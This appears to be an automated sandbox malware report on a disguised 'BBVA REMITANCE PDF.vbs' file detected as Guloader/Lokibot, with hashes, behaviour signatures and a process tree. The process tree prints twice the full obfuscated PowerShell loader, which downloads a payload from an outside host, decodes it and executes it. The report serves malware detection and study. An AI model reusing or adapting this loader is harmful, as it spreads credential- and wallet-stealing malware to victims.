Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
22/03/2023, 01:13
General
-
Target
BBVA REMITANCE PDF.vbs
-
Size
11KB
-
MD5
a3e1e0656418b73ed6c01a5e81cab3fe
-
SHA1
eaf764c590b1e8bf83c6099025800cb2659c88d1
-
SHA256
7cdead7bbbb2d7719151b78fca01d9edd4811852c14cdf3034926db09afadeff
-
SHA512
88b2218c4d2fc0f377d4d032a281b9570dc121219d573e5a12ced33420dc48dad2528e7b4e39f974ebe6c74155dcebef9818a053312291c2a470ff25f15dbfef
-
SSDEEP
192:UueqaOrAY2CyGlxgL4rMS2octfPVYS/1UTKeZ7AkDnA4m0H:UbqayAPbGlxg0rWtHSS/1U/tAknH
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Blocklisted process makes network request 1 IoCs
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BBVA REMITANCE PDF.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function bonapar9 ([String]$Quaeoml){For($yohim=1; $yohim -lt $Quaeoml.Length-1; $yohim+=(1+1)){$Statsman=$Statsman+$Quaeoml.Substring($yohim, 1)};$Statsman;}$nemm=bonapar9 'Zh tUt pAsH: /I/OvSi c t oAr iSa mCePdAiPc .GcToHmB/ HSoArSs eHk e eTp eF.huT3A2T ';$Statsman01=bonapar9 'Di e xS ';$cente = bonapar9 ' \ sQy s wFo wg6H4 \ W iSnNdDoCw s PSo wSeAr SShVeSl lA\Sv 1U.O0C\ pBodwCe rPs hheFl l .neExReS ';.($Statsman01) (bonapar9 'P$PMMePt opdBiLk sS2 = $Te nCvB:TwLiDnBd iRr ') ;.($Statsman01) (bonapar9 'T$ cSeOnGt eA=W$BMGeStIoTd iAk sF2 +H$ c eSnAtBeP ') ;.($Statsman01) (bonapar9 'D$fU nWa bMaBsk =L S( (DgSwUmRiR rw iUnp3 2 _ p rNo cSe sSs P-SFI OPKrCoWcYe s s I d =D$Y{UPPIODS} )b.VCKoSmSm aVn dTLMiAn e )K K-Os pHlSiOt C[AcKh a rJ] 3 4 ');.($Statsman01) (bonapar9 ' $DSMpViUrmlTi ePhMyN =P $AU nia bPa sS[R$ USn a b aMsE.Ac o uIn tG- 2F]N ');.($Statsman01) (bonapar9 'C$PASpTo gfeTi cSaL=C(ATFeFs tC-UPTaKtAhI $CcDe nMt e )N S- ABn dS S( [ ICnAtKP t rH]M: :UsKiTzVeM f-BeGq G8C) ') ;if ($Apogeica) {.$cente $Spirliehy;} else {;$Statsman00=bonapar9 'USJtSaRrSt -PBEi t sPT r a nBsCf eSrV F- S oSu r cSe M$ nHe m mR F-VD eFs tBi n aStiiSo n $EM e tFo d i k sF2O ';.($Statsman01) (bonapar9 ' $ M eGt oRd i kHs 2B= $ eSn v : a p p dPaCtPaF ') ;.($Statsman01) (bonapar9 'PIImWpPoVr t - Mlo dAuSlPe SBii t s T r aRn smfLe r ') ;$Metodiks2=$Metodiks2+'\Bramsh.Ris';while (-not $Swel) {.($Statsman01) (bonapar9 'S$KSAwSe l = ( T e sFt -EPOajt hS $ M e t oSdLiOk sF2S) ') ;.($Statsman01) $Statsman00;.($Statsman01) (bonapar9 'PSSt aPr t - S l eSe pO R5 ');}.($Statsman01) (bonapar9 'P$ bGoSn a pPamr =H HG ePt -AC o n t e nFtA T$HM eDtVo d i kAsS2S ');.($Statsman01) (bonapar9 ' $ GNrUaVvUr u C= p[CS y sbtAeDm .SC o ndv eHr tP] : :LFPrGo maBNaFs eC6I4 S t rPiDn gA( $Eb orn a pBa r )T ');.($Statsman01) (bonapar9 ' $ SPt a t s m a nD2Z =C [rS yHsFtFe m . T e xStT.SE nMcHo d iSnVg ]D: : AKSRCII I .uGEeEtRSTtTrSiTn g (B$CGGrUa v r u )D ');.($Statsman01) (bonapar9 ' $TR e sOcTr aStNc hTpC=D$ SBt act s mCaInT2A.DsLuEbLs tsrsi nTg (Q1 8H1L7S6L4 , 1 9J6 1 6 )U ');.($Statsman01) $Rescratchp;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function bonapar9 ([String]$Quaeoml){For($yohim=1; $yohim -lt $Quaeoml.Length-1; $yohim+=(1+1)){$Statsman=$Statsman+$Quaeoml.Substring($yohim, 1)};$Statsman;}$nemm=bonapar9 'Zh tUt pAsH: /I/OvSi c t oAr iSa mCePdAiPc .GcToHmB/ HSoArSs eHk e eTp eF.huT3A2T ';$Statsman01=bonapar9 'Di e xS ';$cente = bonapar9 ' \ sQy s wFo wg6H4 \ W iSnNdDoCw s PSo wSeAr SShVeSl lA\Sv 1U.O0C\ pBodwCe rPs hheFl l .neExReS ';.($Statsman01) (bonapar9 'P$PMMePt opdBiLk sS2 = $Te nCvB:TwLiDnBd iRr ') ;.($Statsman01) (bonapar9 'T$ cSeOnGt eA=W$BMGeStIoTd iAk sF2 +H$ c eSnAtBeP ') ;.($Statsman01) (bonapar9 'D$fU nWa bMaBsk =L S( (DgSwUmRiR rw iUnp3 2 _ p rNo cSe sSs P-SFI OPKrCoWcYe s s I d =D$Y{UPPIODS} )b.VCKoSmSm aVn dTLMiAn e )K K-Os pHlSiOt C[AcKh a rJ] 3 4 ');.($Statsman01) (bonapar9 ' $DSMpViUrmlTi ePhMyN =P $AU nia bPa sS[R$ USn a b aMsE.Ac o uIn tG- 2F]N ');.($Statsman01) (bonapar9 'C$PASpTo gfeTi cSaL=C(ATFeFs tC-UPTaKtAhI $CcDe nMt e )N S- ABn dS S( [ ICnAtKP t rH]M: :UsKiTzVeM f-BeGq G8C) ') ;if ($Apogeica) {.$cente $Spirliehy;} else {;$Statsman00=bonapar9 'USJtSaRrSt -PBEi t sPT r a nBsCf eSrV F- S oSu r cSe M$ nHe m mR F-VD eFs tBi n aStiiSo n $EM e tFo d i k sF2O ';.($Statsman01) (bonapar9 ' $ M eGt oRd i kHs 2B= $ eSn v : a p p dPaCtPaF ') ;.($Statsman01) (bonapar9 'PIImWpPoVr t - Mlo dAuSlPe SBii t s T r aRn smfLe r ') ;$Metodiks2=$Metodiks2+'\Bramsh.Ris';while (-not $Swel) {.($Statsman01) (bonapar9 'S$KSAwSe l = ( T e sFt -EPOajt hS $ M e t oSdLiOk sF2S) ') ;.($Statsman01) $Statsman00;.($Statsman01) (bonapar9 'PSSt aPr t - S l eSe pO R5 ');}.($Statsman01) (bonapar9 'P$ bGoSn a pPamr =H HG ePt -AC o n t e nFtA T$HM eDtVo d i kAsS2S ');.($Statsman01) (bonapar9 ' $ GNrUaVvUr u C= p[CS y sbtAeDm .SC o ndv eHr tP] : :LFPrGo maBNaFs eC6I4 S t rPiDn gA( $Eb orn a pBa r )T ');.($Statsman01) (bonapar9 ' $ SPt a t s m a nD2Z =C [rS yHsFtFe m . T e xStT.SE nMcHo d iSnVg ]D: : AKSRCII I .uGEeEtRSTtTrSiTn g (B$CGGrUa v r u )D ');.($Statsman01) (bonapar9 ' $TR e sOcTr aStNc hTpC=D$ SBt act s mCaInT2A.DsLuEbLs tsrsi nTg (Q1 8H1L7S6L4 , 1 9J6 1 6 )U ');.($Statsman01) $Rescratchp;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
Filesize
342B
MD5b1ebd3520e79cd817e3d0f5cdba2f72d
SHA1eb5bca541d75dab8a4cc1201ebec00c5f01ba1c3
SHA2563bec6dcfd8f9e219702ba37113eaff5027ed4c290c764516ffa083e0b8e42b19
SHA51289a4dcf66eb57803d40d25cf15b9bac137b371dde009a97bc88cb0046023bad4f3859cab372040af2b1871450ad8aa21036d0d0f3da52bf1c6170eaa7499ddcb
-
Filesize
342B
MD595bad94913f99c24fd3011705fde487c
SHA10831eb1a3cd4c26af8baac805da9ed45e45ef21c
SHA2563ea340d74922c8c30c21bf203554cead285264ab06f49be7af759e63e30858de
SHA51253cf418efe9d07bc6724bc3b91f48b48df9390eb3d9cb14c95805fbca396674b275b0acac31c8c8318c2b23a77815bcde3e73345b68b07e6c908566a74490472
-
Filesize
61KB
MD5e71c8443ae0bc2e282c73faead0a6dd3
SHA10c110c1b01e68edfacaeae64781a37b1995fa94b
SHA25695b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6
-
Filesize
161KB
MD5be2bec6e8c5653136d3e72fe53c98aa3
SHA1a8182d6db17c14671c3d5766c72e58d87c0810de
SHA2561919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd
SHA5120d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff
-
Filesize
7KB
MD59bef19dc871f6dce0bd079beeca4a60d
SHA195122578afa531cdf4ecb4f006029d03ae017a4f
SHA2567751bcb03b8d8ea27a04f0280591290d9ecfc481bdf44430261df22d63b5904d
SHA51224ff14c4287dc1d9da2984e5975bfcc1ed5c4acd57f32c6e9d2979b15c8fc56eba36ad595fbbcf061509c85a783e09dab67c449fbce7ea1d80b02240091f1b42
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
34.1MB
-
Filesize
34.1MB
-
Filesize
34.1MB
-
Filesize
34.1MB
-
Filesize
2.1MB
-
Filesize
34.1MB
-
Filesize
34.1MB
-
Filesize
256KB
-
Filesize
4KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB